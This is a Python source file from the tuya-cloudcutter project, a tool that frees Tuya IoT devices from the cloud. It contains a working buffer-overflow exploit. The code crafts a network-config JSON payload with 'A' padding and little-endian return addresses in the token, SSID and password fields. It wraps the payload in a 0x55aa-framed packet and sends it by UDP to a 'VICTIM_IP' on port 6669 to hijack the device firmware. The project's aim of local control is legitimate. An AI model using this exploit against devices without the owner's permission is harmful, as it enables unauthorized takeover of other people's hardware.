tuya-cloudcutter
A tool that disconnects Tuya IoT devices from the cloud, allowing them to run completely locally.
import random
import socket
import string
import struct
import time
import zlib
from distutils.command.config import config
from typing import Dict
from .device import DeviceConfig
MAX_CONFIG_PACKET_PAYLOAD_LEN = 0xE8
VICTIM_IP = '192.168.175.1'
VICTIM_PORT = 6669
LOCAL_KEY_LENGTH = 16
SEC_KEY_LENGTH = 16
DEVICE_ID_LENGTH = 20
PSK_LENGTH = 32
def build_network_config_packet(payload):
if len(payload) > MAX_CONFIG_PACKET_PAYLOAD_LEN:
raise ValueError('Payload is too long!')
# NOTE
# fr_num and crc do not seem to be used in the disas
# calculating them anyway - in case it's needed
# for some reason.
tail_len = 8
head, tail = 0x55aa, 0xaa55
fr_num, fr_type = 0, 0x1
plen = len(payload) + tail_len
buffer = struct.pack("!IIII", head, fr_num, fr_type, plen)
buffer += payload
crc = zlib.crc32(buffer)
buffer += struct.pack("!II", crc, tail)
return buffer
def send_network_config_datagram(datagram):
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(datagram, (VICTIM_IP, VICTIM_PORT))
def encode_json_val(value):
encoded = []
escaped = list(map(ord, '"\\'))
escape_char = ord('\\')
for i in value:
if i in escaped:
encoded.append(escape_char)
encoded.append(i)
return bytes(encoded)
def check_valid_payload(value):
def eq_zero(x): return x == 0
if any(map(eq_zero, value)):
raise ValueError('At least one null byte detected in payload!')
return value
def generate_random_ascii_string(length):
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
def create_device_specific_config(args, combined, uuid, auth_key, psk_key = None) -> DeviceConfig:
config = DeviceConfig({})
config.set(DeviceConfig.UUID, uuid)
config.set(DeviceConfig.AUTH_KEY, auth_key)
config.set(DeviceConfig.LOCAL_KEY, generate_random_ascii_string(LOCAL_KEY_LENGTH) if len(args.local_key) == 0 else args.local_key)
config.set(DeviceConfig.SEC_KEY, generate_random_ascii_string(SEC_KEY_LENGTH))
config.set(DeviceConfig.DEVICE_ID, generate_random_ascii_string(DEVICE_ID_LENGTH) if len(args.device_id) == 0 else args.device_id)
config.set(DeviceConfig.CHIP_FAMILY, combined["profile"]['firmware']['chip'].upper())
config.set(DeviceConfig.PROFILE, combined["profile"]["name"] + " / " + combined["profile"]["sub_name"])
config.set(DeviceConfig.DEVICE, combined['slug'])
if psk_key is not None:
config.set(DeviceConfig.PSK, psk_key)
return config
def exploit_device_with_config(args, combined: Dict) -> DeviceConfig:
data = combined["profile"]["data"]
address_finish = int(data.get("address_finish", "0"), 0)
address_finish = address_finish.to_bytes(byteorder="little", length=3).rstrip(b"\x00")
address_ssid = int(data.get("address_ssid", "0"), 0)
address_ssid = address_ssid.to_bytes(byteorder="little", length=3).rstrip(b"\x00")
address_ssid_padding = int(data.get("address_ssid_padding", 4))
address_passwd = int(data.get("address_passwd", "0"), 0)
address_passwd = address_passwd.to_bytes(byteorder="little", length=3).rstrip(b"\x00")
address_datagram = int(data.get("address_datagram", "0"), 0)
address_datagram = address_datagram.to_bytes(byteorder="little", length=4)
uuid = generate_random_ascii_string(12)
auth_key = generate_random_ascii_string(16)
payload = {
"auzkey": auth_key,
"uuid": uuid,
"pskKey": "",
"prod_test": False,
"ap_ssid": "A",
"ssid": "A",
"token": b"A" * 72 + address_finish,
}
if address_ssid:
padding = 4
if address_ssid_padding:
padding = address_ssid_padding
payload["ssid"] = b"A" * padding + address_ssid
if address_passwd:
payload["passwd"] = address_passwd
payload = {
k: b'"' + v + b'"'
if isinstance(v, bytes)
else b'true'
if v == True
else b'false'
if v == False
else b'"' + v.encode() + b'"'
for k, v in payload.items()
}
payload = [f'"{k}":'.encode() + v for k, v in payload.items()]
payload = b"{" + b",".join(payload) + b"}"
payload = check_valid_payload(payload)
datagram = build_network_config_packet(payload)
if address_datagram:
pad_length = 256 - len(datagram)
datagram += b"A" * (pad_length % 4)
datagram += address_datagram * int(pad_length / 4)
assert len(datagram) == 256
for _ in range(5):
send_network_config_datagram(datagram)
time.sleep(.200)
return create_device_specific_config(args, combined, uuid, auth_key)